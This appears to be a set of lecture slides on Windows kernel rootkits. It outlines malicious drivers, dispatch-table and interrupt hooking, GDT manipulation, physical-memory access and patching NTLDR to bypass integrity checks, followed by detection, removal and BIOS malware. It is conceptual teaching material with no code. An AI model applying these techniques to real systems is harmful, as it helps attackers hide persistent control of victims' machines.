  • Manipulating Windows Kernel Various alternatives to get evil device driver to run: Evil driver can overwrite kernel. Driver replaces existing code. Evil driver implements various kernel functions and then changes the system dispatch table. Interrupt hooking changes how the kernel handles CPU interrupts.
  • Slide 170
  • Manipulating Windows Kernel Altering a Running Kernel in Memory Instead of a device driver, directly change the kernel code in memory.
  • Slide 171
  • Manipulating Windows Kernel Altering a Running Kernel in Memory: Windows uses the Global Descriptor Table (GDT) to manage memory. GDT stores division into various segments. Store segment accessibility by ring 0/3. Unfortunately, attacker can add a memory segment to the GDT. Greg Hoglund Phrak 55 Explains how to bypass Security Monitor. Add memory segment from location 0x00000000 to 0xffffffff. This gives memory access to all user processes!
  • Slide 172
  • Manipulating Windows Kernel
  • Slide 173
  • Altering a Running Kernel in Memory: Alternatively, manipulate \Device\PhysicalMemory object. Alternatively, use PhysMem from sysinternals.com. Attacker can now change system functionality.
  • Slide 174
  • Manipulating Windows Kernel Patching the Kernel on the Hard Drive Not as easy as it sounds. System boot checks integrity of Ntoskrnl.exe. Thus, not possible to only change the kernel file. Have to change both the integrity checker and the kernel. Integrity checker sits in NTLDR. Attack: Change one instruction to jump over the integrity check. Currently, not heavily used.
  • Slide 175
  • Manipulating Windows Kernel Patching the Kernel on the Hard Drive Patch first NTLDR to disable integrity check. Then patch Ntoskrnl.exe to disable security access check. Now introduce rootkit.
  • Slide 176
  • Manipulating Windows Kernel Create a fake system using a virtual machine. Variety of Virtual Machines VMWareVirtual PC Plex86Bochs But need to hide start-up message. Unlike Linux, that is difficult.
  • Slide 177
  • Protecting the Windows Kernel Prevent access to the machine. Detect a rootkit: Antivirus tools recognize most rootkit files before installation. Some rootkits can be spotted afterwards. Because developers were careless. File Integrity Checkers
  • Slide 178
  • Protecting the Windows Kernel Removing Rootkits Analyze system without invoking the kernel. Use a FIRE or Knoppix bootable CD-ROM and look at the hard drive. Registry / File System.
  • Slide 179
  • Next Generation Malware BIOS Malware active before booting from a device. Bioscentral website for tools to look at BIOS. Microkernel